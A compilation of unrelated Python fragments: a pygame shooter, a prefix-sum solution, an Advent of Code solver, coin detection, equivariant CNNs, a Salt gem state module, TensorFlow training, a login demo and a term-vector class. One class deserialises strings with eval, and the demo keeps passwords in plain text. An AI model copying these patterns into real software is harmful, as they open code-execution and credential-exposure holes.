        start_game(ai_settings, screen, stats, ship, rect, bullets)
def start_game(ai_settings, screen, stats, ship, rect, bullets):
    """Reset state and begin a fresh game."""
    ai_settings.initialize_dynamic_settings()
    # Hide the mouse cursor during play.
    pygame.mouse.set_visible(False)
    # Reset the game statistics.
    stats.reset_stats()
    stats.game_active = True
    # Empty the bullet group.
    bullets.empty()
    # Re-center the rectangle and the ship.
    rect.center_rect()
    ship.center_ship()
def check_play_button(ai_settings, screen, stats, play_button,
                      ship, rect, bullets, mouse_x, mouse_y):
    """Start a new game when the player clicks the Play button."""
    button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)
    # Only react while no game is active, so mid-game clicks are ignored.
    if button_clicked and not stats.game_active:
        start_game(ai_settings, screen, stats, ship, rect, bullets)
def check_events(ai_settings, screen, stats, play_button, ship,
                 rect, bullets):
    """Respond to keyboard and mouse events (the main event dispatch loop)."""
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            sys.exit()
        elif event.type == pygame.KEYDOWN:
            check_keydown_events(event, ai_settings, screen, ship, bullets)
        elif event.type == pygame.KEYUP:
            check_keyup_events(event, ai_settings, screen, stats, ship,
                               rect, bullets)
        elif event.type == pygame.MOUSEBUTTONDOWN:
            mouse_x, mouse_y = pygame.mouse.get_pos()
            check_play_button(ai_settings, screen, stats, play_button,
                              ship, rect, bullets, mouse_x, mouse_y)
def update_screen(ai_settings, screen, stats, ship, rect, bullets,
                  play_button):
    """Redraw everything and flip to the newly drawn frame."""
    # Repaint the background on every pass through the loop.
    screen.fill(ai_settings.bg_color)
    ship.blitme()
    # Redraw all bullets behind the ship and the rectangle.
    for bullet in bullets.sprites():
        bullet.draw_bullet()
    rect.draw_rect()
    # Draw the Play button only while the game is inactive.
    if not stats.game_active:
        play_button.draw_button()
    # Make the most recently drawn screen visible.
    pygame.display.flip()
def check_bullet_rect_collisions(ai_settings, screen, ship, rect, bullets):
    """Respond to a bullet hitting the rectangle."""
    collision = pygame.sprite.spritecollideany(rect, bullets)
    # On a hit: speed the game up, delete the bullet, recolor the rectangle
    # with a random RGB color.
    if collision:
        ai_settings.increase_speed()
        bullets.remove(collision)
        rect.rect_color = (randint(0, 255), randint(0, 255), randint(0, 255))
def update_bullets(ai_settings, screen, stats, ship, rect, bullets):
    """Advance bullets, handle misses, and check for rectangle hits."""
    # Update bullet positions.
    bullets.update()
    # A bullet leaving the right edge counts as a miss: it costs one ship
    # and is removed; when no ships remain the game ends and the cursor
    # is shown again.
    for bullet in bullets.copy():
        if bullet.rect.right >= screen.get_rect().right:
            if stats.ships_left > 0:
                stats.ships_left -= 1
                bullets.remove(bullet)
            else:
                stats.game_active = False
                pygame.mouse.set_visible(True)
    check_bullet_rect_collisions(ai_settings, screen, ship, rect, bullets)
def change_rect_direction(ai_settings, rect):
    """Flip the sign of the rectangle's movement direction setting."""
    ai_settings.rect_direction = -ai_settings.rect_direction
def check_rect_edges(ai_settings, rect):
    """Reverse the rectangle's travel direction when it reaches an edge."""
    if not rect.check_edges():
        return
    change_rect_direction(ai_settings, rect)
def update_rect(ai_settings, stats, screen, ship, rect, bullets):
    """Bounce the rectangle off screen edges, then advance its position."""
    check_rect_edges(ai_settings, rect)
    rect.update()
|
# Answering each rectangle-sum query with a direct scan is too slow in
# Python, so build a 2-D prefix-sum (DP) table once and answer every
# query in O(1). (The original code had two syntax errors -- an
# unfinished ``dp`` assignment and ``for a in range = (...)`` -- and
# shadowed the builtin ``sum``.)
import sys

read = sys.stdin.readline

n, m = map(int, read().split())
array = [list(map(int, read().split())) for _ in range(n)]

# prefix[i][j] = sum of array rows 0..i-1, cols 0..j-1 (1-based prefixes).
prefix = [[0] * (m + 1) for _ in range(n + 1)]
for i in range(1, n + 1):
    for j in range(1, m + 1):
        prefix[i][j] = (array[i - 1][j - 1] + prefix[i - 1][j]
                        + prefix[i][j - 1] - prefix[i - 1][j - 1])

k = int(read())
results = []
for _ in range(k):
    i, j, x, y = map(int, read().split())
    # Inclusion-exclusion over the prefix table for rows i..x, cols j..y
    # (all 1-based, inclusive).
    results.append(prefix[x][y] - prefix[i - 1][y]
                   - prefix[x][j - 1] + prefix[i - 1][j - 1])

# One answer per line, matching the original per-query prints.
print('\n'.join(map(str, results)))
|
#!/usr/bin/env python
"""Day 16 of advent of code"""
def swap(array, index_a, index_b):
    """Exchange the elements at the two given positions in place."""
    array[index_a], array[index_b] = array[index_b], array[index_a]
def dance(array, commands):
    """Apply the dance moves in *commands* to *array* in place.

    Moves: ``sN`` spin (rotate the last N elements to the front),
    ``xA/B`` exchange by position, ``pA/B`` partner swap by value.
    """
    for command in commands:
        move, rest = command[0], command[1:]
        if move == 's':
            # PERF: rotate with one slice assignment instead of N
            # insert(0)/delete pairs (the original was O(N) per spin).
            spin_size = int(rest)
            if spin_size:
                array[:] = array[-spin_size:] + array[:-spin_size]
        elif move == 'x':
            index_a, index_b = (int(p) for p in rest.split('/'))
            array[index_a], array[index_b] = array[index_b], array[index_a]
        elif move == 'p':
            swap_a, swap_b = rest.split('/')
            index_a, index_b = array.index(swap_a), array.index(swap_b)
            array[index_a], array[index_b] = array[index_b], array[index_a]
def part_one(data):
    """Part one: run the dance once over programs a..p."""
    programs = list('abcdefghijklmnop')
    dance(programs, data.split(','))
    return ''.join(programs)
def part_two(data):
    """Part two"""
    array = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
             'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p']
    commands = data.split(',')
    # NOTE(review): the modulo assumes the dance sequence repeats with
    # period 30 for this particular puzzle input (presumably found
    # empirically); it is not general -- verify the cycle length before
    # reusing with a different input file.
    for _ in range(1000000000 % 30):
        dance(array, commands)
    return ''.join(map(str, array))
if __name__ == '__main__':
    with open('day16.input', 'r') as f:
        INPUT_DATA = f.read()
    # BUG FIX: the bare ``print x`` statement form is Python 2 only and a
    # SyntaxError on Python 3; the parenthesized call works on both.
    print(part_one(INPUT_DATA))
    print(part_two(INPUT_DATA))
|
import numpy as np
from scipy.ndimage.filters import sobel, gaussian_filter
from skimage import filter, transform, feature
from skimage import img_as_float
from coins._hough import hough_circles
def compute_center_pdf(image, radius,
                       low_threshold, high_threshold,
                       gradient_sigma=0, confidence_sigma=0):
    """ Creates a map representing the probability that each point on an image
    is the center of a circle.
    """
    # detect edges (Canny; the thresholds are supplied by the caller)
    edges = filter.canny(image, 0, low_threshold, high_threshold)
    # cdef cnp.ndarray[ndim=2, dtype=cnp.double_t] dxs, dys
    # Smooth before differencing so the gradient directions are less noisy.
    smoothed = gaussian_filter(image, gradient_sigma)
    # Stack the two Sobel derivatives into an (H, W, 2) array of gradients
    # used as edge normals by the Hough transform below.
    normals = np.transpose(np.array([sobel(smoothed, 0),
                                     sobel(smoothed, 1)]), (1, 2, 0))
    # compute circle probability map
    center_pdf = hough_circles(img_as_float(edges), normals, radius, flip=True)
    # blur to account for lack of confidence in tangents
    # ideally this should be part of the hough transform and it should be
    # possible to specify angular and radial confidence seperately but doing so
    # is crazy slow
    center_pdf_smoothed = gaussian_filter(center_pdf, confidence_sigma)
    return center_pdf_smoothed
def detect_possible_circles(image):
    """Detect candidate circles at multiple scales via a Gaussian pyramid.

    Returns parallel arrays ``(x_coords, y_coords, radii, weights)`` of
    candidate circle centers (in original-image coordinates), their radii,
    and their Hough-response weights.
    """
    radius = 20  # TODO magic
    step = 1.1
    image = img_as_float(image)
    x_coords = []
    y_coords = []
    radii = []
    weights = []
    # Search for a fixed pixel radius at every pyramid level; a detection
    # at a smaller scale corresponds to a larger radius in the original.
    scaled_images = transform.pyramid_gaussian(image, downscale=step)
    for scaled_image in scaled_images:
        scale = scaled_image.shape[0] / image.shape[0]
        # don't bother searching for coins larger than the image
        if scaled_image.size < (2*radius)**2:
            break
        center_pdf = compute_center_pdf(scaled_image, radius, 0.2, 0.3, 0, 3)
        # TODO better way of detecting peeks (gmm or something
        # For some reason `peak_local_max` with `indices=True` returns an
        # array of vectors with the x and y axis swapped.
        # using `np.nonzero` and `indices=False` is a workaround.
        s_x_coords, s_y_coords = np.nonzero(
            feature.peak_local_max(center_pdf, indices=False)
        )
        s_weights = center_pdf[s_x_coords, s_y_coords]
        # Convert from scaled image to image coordinates
        # At some point it would be nice to detect peaks with subpixel accuracy
        # so also convert to floating point
        s_x_coords = s_x_coords.astype(np.float64) / scale
        s_y_coords = s_y_coords.astype(np.float64) / scale
        s_radii = np.repeat(radius/scale, s_weights.size)
        x_coords.append(s_x_coords)
        y_coords.append(s_y_coords)
        radii.append(s_radii)
        weights.append(s_weights)
    # Flatten the per-level results into single arrays.
    x_coords = np.concatenate(x_coords)
    y_coords = np.concatenate(y_coords)
    radii = np.concatenate(radii)
    weights = np.concatenate(weights)
    return x_coords, y_coords, radii, weights
def prune_overlapping(x_coords, y_coords, radii, weights, threshold=1):
    """ Remove coins overlapping other coins with higher weights
    """
    kept = []
    # Visit candidates from heaviest to lightest; keep a candidate only if
    # its center is far enough from every already-kept circle.
    for idx in np.argsort(weights)[::-1]:
        cx, cy, cr = x_coords[idx], y_coords[idx], radii[idx]
        clear = True
        for kept_idx in kept:
            dx = x_coords[kept_idx] - cx
            dy = y_coords[kept_idx] - cy
            limit = threshold * max(cr, radii[kept_idx])
            if dx * dx + dy * dy < limit * limit:
                clear = False
                break
        if clear:
            kept.append(idx)
    return np.array(kept, dtype=np.int64)
|
import e3cnn.nn as enn
from e3cnn import gspaces
import torch.nn as nn
import numpy as np
from .base import BaseEquiv, GatedFieldType
from .ft_nonlinearity import FTNonLinearity
class SteerableCNN(BaseEquiv):
    """SO(3)-steerable 3D CNN: equivariant trunk, invariant pooling, conv head."""

    def __init__(self, in_channels=1, out_channels=1, type='spherical', max_freq=2, kernel_size=3, padding=0, initialize=True, **kwargs):
        gspace = gspaces.rot3dOnR3()
        super().__init__(gspace, in_channels, kernel_size, padding, **kwargs)
        # Field types of increasing width; the last block is limited to
        # max_freq=1. The integers are channel budgets passed to
        # GatedFieldType.build -- confirm semantics against that helper.
        small_type = GatedFieldType.build(gspace, 60, type=type)
        mid_type = GatedFieldType.build(gspace, 240, type=type)
        final_type = GatedFieldType.build(gspace, 240, type=type, max_freq=1)
        common_kwargs = {
            'kernel_size': kernel_size,
            'padding': self.padding,
            'initialize': initialize,
        }
        # First block downsamples with stride 2; the rest keep resolution.
        blocks = [
            self.get_block(self.input_type, small_type, **common_kwargs, stride=2),
            self.get_block(small_type.no_gates(), small_type, **common_kwargs),
            self.get_block(small_type.no_gates(), mid_type, **common_kwargs),
            self.get_block(mid_type.no_gates(), final_type, **common_kwargs),
        ]
        self.model = enn.SequentialModule(*blocks)
        # Norm pooling collapses equivariant fields into invariant channels.
        self.pool = enn.NormPool(blocks[-1].out_type)
        pool_out = self.pool.out_type.size
        # Plain (non-equivariant) head: undo the stride-2 downsample and map
        # to the requested number of output channels.
        self.final = nn.Sequential(
            nn.Upsample(scale_factor=2),
            nn.Conv3d(pool_out, out_channels, kernel_size=1)
        )
        # Spatial crop introduced by the conv stack -- presumably consumed
        # by BaseEquiv; confirm against the base class.
        self.crop = np.array([7,7,7])

    def get_block(self, in_type, out_type, **kwargs):
        """Conv + batch norm + nonlinearity (gated when the type has gates)."""
        layers = []
        layers.append( enn.R3Conv(in_type, out_type, **kwargs) )
        layers.append( enn.IIDBatchNorm3d(out_type) )
        if out_type.gated is None:
            # No gated fields: a plain equivariant ELU suffices.
            layers.append( enn.ELU(out_type, inplace=True) )
        else:
            # Split the type: ELU on trivial fields, gated nonlinearity on
            # the gated fields together with their gates.
            layers.append(
                enn.MultipleModule(out_type,
                    labels=[
                        *( len(out_type.trivials) * ['trivial'] + (len(out_type.gated) + len(out_type.gates)) * ['gate'] )
                    ],
                    modules=[
                        (enn.ELU(out_type.trivials, inplace=True), 'trivial'),
                        (enn.GatedNonLinearity1(out_type.gated+out_type.gates,
                            len(out_type.gated)*['gated']+len(out_type.gates)*['gate']), 'gate')
                    ]
                )
            )
        return enn.SequentialModule(*layers)

    def forward(self, x):
        """Equivariant trunk -> invariant norm pool -> plain conv head."""
        x = self.pre_forward(x)
        x = self.model(x)
        x = self.pool(x)
        # Unwrap the GeometricTensor before the non-equivariant layers.
        x = x.tensor
        x = self.final(x)
        return x
class SteerableFTCNN(BaseEquiv):
    """Variant of the steerable CNN that applies nonlinearities through a
    Fourier-transform module (FTNonLinearity).  With type='trivial' it reduces
    to an ordinary CNN with pointwise ELUs."""
    def __init__(self,
            in_channels=1,
            out_channels=1,
            max_freq=2,
            kernel_size=3,
            padding=0,
            type='spherical',
            initialize=True, **kwargs):
        gspace = gspaces.rot3dOnR3()
        super().__init__(gspace, in_channels, kernel_size, padding, **kwargs)
        self.type = type
        common_kwargs = {
            'kernel_size': kernel_size,
            'padding': self.padding,
            'initialize': initialize,
        }
        # Per-block settings; only the first block strides (downsamples by 2).
        # NOTE(review): the constructor's ``max_freq`` parameter is never used
        # — every entry hard-codes 'max_freq': 2.  Confirm whether it should
        # be threaded through here instead.
        params = [
            {'max_freq': 2, 'out_channels': 120, **common_kwargs, 'stride': 2},
            {'max_freq': 2, 'out_channels': 240, **common_kwargs},
            {'max_freq': 2, 'out_channels': 480, **common_kwargs},
            {'max_freq': 2, 'out_channels': 960, **common_kwargs},
            {'max_freq': 2, 'out_channels': 240, **common_kwargs},
        ]
        blocks = []
        in_type = self.input_type
        # Chain the blocks; each get_block call reports the type it produced.
        for param in params:
            block, in_type = self.get_block(in_type, **param)
            blocks.append(block)
        self.model = enn.SequentialModule(*blocks)
        # Rotation-invariant readout: norm pool, then a plain Conv3d head.
        self.pool = enn.NormPool(blocks[-1].out_type)
        pool_out = self.pool.out_type.size
        self.final = nn.Sequential(
            nn.Upsample(scale_factor=2),  # undo the stride-2 downsampling
            nn.Conv3d(pool_out, out_channels, kernel_size=1)
        )
        # input layer + crop of each block
        self.crop = np.array([9,9,9])
    @staticmethod
    def get_dim(max_freq, spherical=False):
        """Total fiber dimension for frequencies l = 0..max_freq:
        2l+1 entries per frequency for spherical signals, (2l+1)^2 for the
        full SO(3) case."""
        if spherical:
            return sum([2*l+1 for l in range(max_freq+1)])
        else:
            return sum([(2*l+1)**2 for l in range(max_freq+1)])
    def get_block(self, in_type, out_channels, max_freq=2, **kwargs):
        """Dispatch on ``self.type``.

        NOTE(review): implicitly returns None for any type outside
        {'trivial', 'spherical', 'so3'}, which makes the caller crash while
        unpacking — consider raising ValueError instead.
        """
        if self.type == 'trivial':
            return self._get_block_trivial(in_type, out_channels, **kwargs)
        elif self.type in ['spherical', 'so3']:
            return self._get_block_non_trivial(in_type, out_channels, max_freq=max_freq, **kwargs)
    def _get_block_trivial(self, in_type, channels, **kwargs):
        # Ordinary conv block: all fields trivial, so a pointwise ELU is valid.
        out_type = enn.FieldType(self.gspace, channels*[self.gspace.trivial_repr])
        return enn.SequentialModule(
            enn.R3Conv(in_type, out_type, **kwargs),
            enn.IIDBatchNorm3d(out_type),
            enn.ELU(out_type, inplace=True)
        ), out_type
    def _get_block_non_trivial(self, in_type, out_channels, max_freq=2, **kwargs):
        # Choose a multiplicity so channels * per-field dimension approximates
        # the requested out_channels (at least one field).
        dim = self.get_dim(max_freq, spherical=self.type=='spherical')
        channels = max(1, out_channels // dim)
        ft_nonlin = FTNonLinearity(max_freq, channels, 'cube', spherical=self.type=='spherical')
        # The nonlinearity dictates both the conv output type and the block's
        # final type.
        mid_type, out_type = ft_nonlin.in_type, ft_nonlin.out_type
        return enn.SequentialModule(
            enn.R3Conv(in_type, mid_type, **kwargs),
            enn.IIDBatchNorm3d(mid_type),
            ft_nonlin
        ), out_type
    def forward(self, x):
        x = self.pre_forward(x)  # input wrapping/preprocessing from BaseEquiv
        x = self.model(x)
        x = self.pool(x)
        x = x.tensor             # unwrap the GeometricTensor
        x = self.final(x)
        return x
|
# -*- coding: utf-8 -*-
'''
Installation of Ruby modules packaged as gems
=============================================
A state module to manage rubygems. Gems can be set up to be installed
or removed. This module will use RVM if it is installed. In that case,
you can specify what ruby version and gemset to target.
.. code-block:: yaml
addressable:
gem.installed:
- user: rvm
- ruby: jruby@jgemset
'''
# Import salt libs
import salt.utils
def __virtual__():
    '''
    Load this state module only when the ``gem`` execution module is present
    in ``__salt__``.
    '''
    if 'gem.list' in __salt__:
        return 'gem'
    return False
def installed(name,          # pylint: disable=C0103
        ruby=None,
        runas=None,
        user=None,
        version=None,
        rdoc=False,
        ri=False):           # pylint: disable=C0103
    '''
    Make sure that a gem is installed.

    name
        The name of the gem to install

    ruby: None
        For RVM installations: the ruby version and gemset to target.

    runas: None
        The user under which to run the ``gem`` command

        .. deprecated:: 0.17.0

    user: None
        The user under which to run the ``gem`` command

        .. versionadded:: 0.17.0

    version : None
        Specify the version to install for the gem.
        Doesn't play nice with multiple gems at once

    rdoc : False
        Generate RDoc documentation for the gem(s).

    ri : False
        Generate RI documentation for the gem(s).
    '''
    ret = {'name': name, 'result': None, 'comment': '', 'changes': {}, 'state_stdout': ''}
    salt.utils.warn_until(
        'Hydrogen',
        'Please remove \'runas\' support at this stage. \'user\' support was '
        'added in 0.17.0',
        _dont_call_warnings=True
    )
    if runas:
        # Warn users about the deprecation
        ret.setdefault('warnings', []).append(
            'The \'runas\' argument is being deprecated in favor of \'user\', '
            'please update your state files.'
        )
    if user is not None and runas is not None:
        # user wins over runas but let warn about the deprecation.
        ret.setdefault('warnings', []).append(
            'Passed both the \'runas\' and \'user\' arguments. Please don\'t. '
            '\'runas\' is being ignored in favor of \'user\'.'
        )
        runas = None
    elif runas is not None:
        # Support old runas usage
        user = runas
        runas = None
    gems = __salt__['gem.list'](name, ruby, runas=user)
    if name in gems and version and version in gems[name]:
        # The requested version is already present.
        ret['result'] = True
        ret['comment'] = 'Gem is already installed.'
        return ret
    elif name in gems and not version:
        # BUG FIX: this branch was previously ``elif name in gems:``, which
        # declared success even when a specific ``version`` was requested but
        # a *different* version was installed.  Restricting it to the
        # no-version case lets a version mismatch fall through to the install
        # call below.
        ret['result'] = True
        ret['comment'] = 'Gem is already installed.'
        return ret
    if __opts__['test']:
        ret['comment'] = 'The gem {0} would have been installed'.format(name)
        return ret
    if __salt__['gem.install'](name,
            ruby=ruby,
            runas=user,
            version=version,
            rdoc=rdoc,
            ri=ri, state_ret=ret):
        ret['result'] = True
        ret['changes'][name] = 'Installed'
        ret['comment'] = 'Gem {0} was successfully installed.'.format(name)
    else:
        ret['result'] = False
        ret['comment'] = 'Could not install gem {0}.'.format(name)
    return ret
def removed(name, ruby=None, runas=None, user=None):
    '''
    Make sure that a gem is not installed.

    name
        The name of the gem to uninstall

    ruby: None
        For RVM installations: the ruby version and gemset to target.

    runas: None
        The user under which to run the ``gem`` command

        .. deprecated:: 0.17.0

    user: None
        The user under which to run the ``gem`` command

        .. versionadded:: 0.17.0
    '''
    ret = {'name': name,
           'result': None,
           'comment': '',
           'changes': {},
           'state_stdout': ''}
    # Deprecation machinery for the legacy ``runas`` argument.
    salt.utils.warn_until(
        'Hydrogen',
        'Please remove \'runas\' support at this stage. \'user\' support was '
        'added in 0.17.0',
        _dont_call_warnings=True
    )
    if runas:
        ret.setdefault('warnings', []).append(
            'The \'runas\' argument is being deprecated in favor of \'user\', '
            'please update your state files.'
        )
    if user is not None and runas is not None:
        # ``user`` takes precedence when both are supplied.
        ret.setdefault('warnings', []).append(
            'Passed both the \'runas\' and \'user\' arguments. Please don\'t. '
            '\'runas\' is being ignored in favor of \'user\'.'
        )
        runas = None
    elif runas is not None:
        # Only the legacy argument was given: honor it as ``user``.
        user = runas
        runas = None
    installed_gems = __salt__['gem.list'](name, ruby, runas=user)
    if name not in installed_gems:
        # Nothing to do.
        ret['result'] = True
        ret['comment'] = 'Gem is not installed.'
        return ret
    if __opts__['test']:
        ret['comment'] = 'The gem {0} would have been removed'.format(name)
        return ret
    uninstalled = __salt__['gem.uninstall'](name, ruby, runas=user, state_ret=ret)
    if uninstalled:
        ret['result'] = True
        ret['changes'][name] = 'Removed'
        ret['comment'] = 'Gem was successfully removed.'
    else:
        ret['result'] = False
        ret['comment'] = 'Could not remove gem.'
    return ret
|
from dataloader import *
import tensorflow as tf
import numpy as np
import argparse
import math
# Fraction of the data set held out for validation.
VAL_RATIO = 0.2
# Fraction of the data set held out for final testing.
TEST_RATIO = 0.2
# NOTE(review): unused in this chunk — presumably a hash-table load factor
# for a baseline index structure; confirm before relying on it.
LOAD_FACTOR = 0.5
def train(args):
    """Train a small fully-connected regressor (TF1 graph mode) that maps
    keys to positions on a synthetic data set, printing per-epoch progress.

    NOTE(review): ``args.hidden_width`` is parsed by the CLI but never used
    here — the hidden width is hard-coded to ``n_hidden = 16``; confirm.
    """
    data_set = load_synthetic_data(args.data_dir, args.norm_label)
    data_sets = create_train_validate_test_data_sets(data_set, VAL_RATIO, TEST_RATIO, scale=args.scale)
    #train_dataset = load_shuttle_data(args.data_dir + '.trn', args.norm_label)
    #validation_dataset = load_shuttle_data(args.data_dir + '.tst', args.norm_label)
    #data_sets = create_train_validate_data_sets(train_dataset, validation_dataset)
    # Minibatches per epoch; integer division drops the trailing partial batch.
    max_step = data_sets.train.num_keys//args.batch_size
    print(data_sets.train.num_keys)
    keys_placeholder = tf.placeholder(tf.float64, shape=(None, data_sets.train.key_size), name="keys")
    # NOTE(review): shape=(None) is just ``None`` (fully unconstrained), not a
    # rank-1 shape; ``preds`` below is (batch, 1), so the MSE relies on
    # broadcasting against whatever shape the labels are fed with — confirm.
    labels_placeholder = tf.placeholder(tf.float64, shape=(None), name="labels")
    n_hidden = 16
    keys_norm = keys_placeholder
    if not args.fix_inputs:
        print("Standardizing data...")
        # Standardize inputs with training-set statistics.
        keys_norm = (keys_placeholder - data_sets.train.keys_mean)/data_sets.train.keys_std
    #W1 = tf.Variable(tf.truncated_normal([data_sets.train.key_size, n_hidden], stddev=1.0 / math.sqrt(float(data_sets.train.key_size + n_hidden)), dtype=tf.float64), dtype=tf.float64)
    #b1 = tf.Variable(tf.zeros([n_hidden], dtype=tf.float64), dtype=tf.float64)
    #W2 = tf.Variable(tf.truncated_normal([n_hidden, 1], stddev=1.0 / math.sqrt(float(n_hidden + 1)), dtype=tf.float64), dtype=tf.float64)
    #b2 = tf.Variable(tf.zeros([1], dtype=tf.float64), dtype=tf.float64)
    #h = tf.nn.relu(tf.matmul(keys_placeholder, W1) + b1)
    #preds = tf.matmul(h, W2) + b2
    #h = tf.nn.sigmoid(tf.matmul(keys_placeholder, W1) + b1)
    #preds = tf.matmul(h, W2) + b2
    # Two hidden ReLU layers and a linear scalar output.
    h1 = tf.layers.dense(inputs=keys_norm, units=n_hidden, activation=tf.nn.relu)
    h2 = tf.layers.dense(inputs=h1, units=n_hidden, activation=tf.nn.relu)
    preds = tf.layers.dense(inputs=h2, units=1)
    loss = tf.losses.mean_squared_error(labels=labels_placeholder, predictions=preds)
    optimizer = tf.train.AdamOptimizer(args.lr)
    global_step = tf.Variable(0, name='global_step', trainable=False)
    train_op = optimizer.minimize(loss, global_step=global_step)
    init = tf.global_variables_initializer()
    with tf.Session() as sess:
        sess.run(init)
        for epoch in range(args.epoch):
            print("epoch: ", epoch)
            for step in range(max_step):
                keys_feed, labels_feed = data_sets.train.next_batch(args.batch_size, True)
                feed_dict = {keys_placeholder: keys_feed, labels_placeholder: labels_feed}
                # ``thao`` is the scalar batch MSE.
                _, thao = sess.run([train_op, loss], feed_dict=feed_dict)
                # Second run re-evaluates predictions on the same feed (extra
                # forward pass, diagnostics only).
                keyss, pred = sess.run([keys_norm, preds], feed_dict=feed_dict)
                # Mean absolute position error, rescaled back by args.scale.
                diff = np.mean(np.abs(pred - labels_feed)/args.scale)
                if (step+1) == 1:  # report only the first batch of each epoch
                    #print((labels_feed//args.scale).T)
                    #print(pred.T)
                    # np.sqrt(thao) reports RMSE under the 'loss' label.
                    print('Step %d: loss = %.10f, diff = %.5f' % (step, np.sqrt(thao), diff))
if __name__ == '__main__':
    # Command-line entry point: parse options and hand them to train().
    cli = argparse.ArgumentParser(description='Training')
    cli.add_argument('-data_dir', default='../data/normal_mean=1_std=1.txt')
    # Required-in-practice numeric options (no defaults).
    cli.add_argument('-lr', type=float)
    cli.add_argument('-batch_size', type=int)
    cli.add_argument('-hidden_width', nargs='+', type=int, default=[16])
    cli.add_argument('-epoch', type=int, default=5)
    # Boolean flags.
    cli.add_argument('-norm_label', action='store_true', help='Whether to normalize labels to be within [0,1]')
    cli.add_argument('-fix_inputs', action='store_true', help='Whether to keep input distribution the same and avoid standardization')
    cli.add_argument('-scale', type=int, default=1, help='how much to scale the gap between consecutive positions')
    args = cli.parse_args()
    train(args)
|
# --- Bigeleisen KIE calculation driver -----------------------------------
import Bigeleisen_KIE as kie
import pandas as pd

# Spreadsheet the user has filled in with the four frequency columns below.
table = pd.read_excel('../OneDrive/Bureau/KIE_Vibration.xlsx')

# Vibrational frequencies, one list per isotopologue / state combination.
light_initial = table['frequencies of the molecule containing the light isotope at the initial state'].to_list()
heavy_initial = table['frequencies of the molecule containing the heavy isotope at the initial state'].to_list()
light_transition = table['frequencies of the molecule containing the light isotope at the transition state'].to_list()
heavy_transition = table['frequencies of the molecule containing the heavy isotope at the transition state'].to_list()

# Temperature is the only interactive input.
T = float(input("Temperature in Kelvin : "))

# Compute the kinetic isotope effect via the Bigeleisen equation.
kie.KIE(light_initial, heavy_initial, light_transition, heavy_transition, T)
|
import getpass
# In-memory credential store: username -> password as typed (plain text,
# demo only; nothing is persisted to disk).
adict = {}
def new_user():
    """Register a new user: prompt for a username and (echo-free) password
    and record them in the in-memory ``adict`` store."""
    user = input('用户名: ').strip()
    if user:
        if user not in adict:
            # BUG FIX: the password prompt had been commented out and replaced
            # by a bare, uncalled ``getpass.getpass`` reference, so ``passwd``
            # was never defined and the check below raised NameError.  Read
            # the password via getpass (no terminal echo), as intended.
            passwd = getpass.getpass('密码: ').strip()
            if passwd:
                adict[user] = passwd
                print('注册成功')
            else:
                print('\033[31;1m密码输入为空,请重新输入.\033[0m')
        else:
            print('\033[31;1m用户已注册,请重新输入.\033[0m')
    else:
        print('输入为空,请重新输入.')
def old_user():
    """Log an existing user in: prompt for username and password and check
    them against the in-memory ``adict`` store."""
    user = input('用户名: ').strip()
    if user:
        passwd = input('密码: ').strip()
        if user in adict:
            if adict[user] == passwd:
                print('\033[31;1m登录成功\033[0m')
            else:
                print('登陆失败')
        else:
            # Unknown user: same failure message as a wrong password, so the
            # prompt does not leak which usernames exist.
            # (A leftover debug ``print(1)`` was removed from this branch.)
            print('登陆失败')
    else:
        print('输入为空,请重新输入.')
def show_menu():
    """Interactive loop: dispatch to register/login handlers until quit."""
    menu_text = """(0): 注册
(1): 登录
(2): 退出
请选择(0/1/2): """
    handlers = {'0': new_user, '1': old_user}
    while True:
        selection = input(menu_text).strip()
        if selection == '2':
            print('\033[31;1mbye-bye\033[0m')
            break
        handler = handlers.get(selection)
        if handler is None:
            print('\033[31;1m无效的参数,请重试.\033[0m')
            continue
        handler()
if __name__ == '__main__':
    # Run the interactive menu only when executed as a script.
    show_menu()
|
"""
A representation of one field.
Created on Aug 2013
@author: zul110
"""
class TvField(object):
    """One named field of a term-vector record.

    Holds a field name (string) and its term vector: a dict mapping
    term -> count.  Python 2 code (note the ``unicode`` fallback and the
    old ``except Exception, e`` syntax below).
    """
    def __init__(self, name, termVector):
        self._name = name # a string
        self._termVector = termVector # a dictionary mapping term -> count
    def to_dict(self):
        # Plain-dict form used for to_string()/from_string() round-tripping.
        return {'name': self._name, 'termVector': self._termVector}
    def to_string(self):
        # Serialized as the repr of the dict; from_string() is the inverse.
        tdict = self.to_dict()
        return str(tdict)
    @classmethod
    def from_string(cls, txtString):
        """Parse a string produced by to_string(); return None on failure.

        SECURITY NOTE(review): ``eval`` executes arbitrary code — only ever
        feed it trusted strings (``ast.literal_eval`` would be safer).  The
        bare ``except`` below also silences *every* failure into None.
        """
        tvrecobj = None
        try:
            dictobj = eval(txtString)
            name = dictobj['name']
            termVector = dictobj['termVector']
            tvrecobj = TvField(name, termVector)
        except:
            pass
        return tvrecobj
    def get_name(self):
        # Accessor for the field name.
        return self._name
    def get_term_vector(self):
        # Accessor for the term -> count dict.
        return self._termVector
    def get_terms_as_str(self):
        """only use every term once

        Join the field's terms with single spaces.  Counts stored in the
        term vector are deliberately ignored (cnt is forced to 1 below).
        """
        strlist = []
        for name, cnt in self._termVector.items():
            cnt = 1 # force a single occurrence per term, per the docstring
            # cnt = int(cnt)
            for i in range(cnt):
                try:
                    strlist.append(name.decode())
                except UnicodeEncodeError:
                    strlist.append(unicode(name))
                except Exception, e:
                    raise e
        return u" ".join(strlist)
def unitTest():
    """Smoke test: build term-vector fields from the three field types and
    print their reconstructed term strings (Python 2 print statements)."""
    from match_engine.datamodel.field_type import TextField, KeywordsField, IdField
    textField = TextField()
    tf31 = textField.toTvRecField('title', 'pig is a pig language to start processing steps')
    print tf31.get_terms_as_str()
    keywordField = KeywordsField()
    tf32 = keywordField.toTvRecField('genre', 'music,arts,arts')
    print tf32.get_terms_as_str()
    idField = IdField()
    # NOTE(review): ``tf32`` is reused here, overwriting the keyword-field
    # result above — possibly a copy/paste slip; harmless as written.
    tf32 = idField.toTvRecField('id', 'abcde123')
    print tf32.get_terms_as_str()
if __name__ == "__main__":
    unitTest()
|
import torch
import pytorch_lightning as pl
# A LightningModule ORGANIZES the PyTorch code into the following modules:
# 1. Computations (init)
# 2. Training loop (training_step)
# 3. Validation loop (validation_step)
# 4. Test loop (test_step)
# 5. Optimizers (configure_optimizers)
##############################################################################
# Minimal Lightning usage sketch.  NOTE: these are illustrative snippets —
# FlashModel / Trainer / MNIST / DataLoader / DistributedSampler are assumed
# to be defined or imported elsewhere; this file is not runnable as-is.
model = FlashModel()
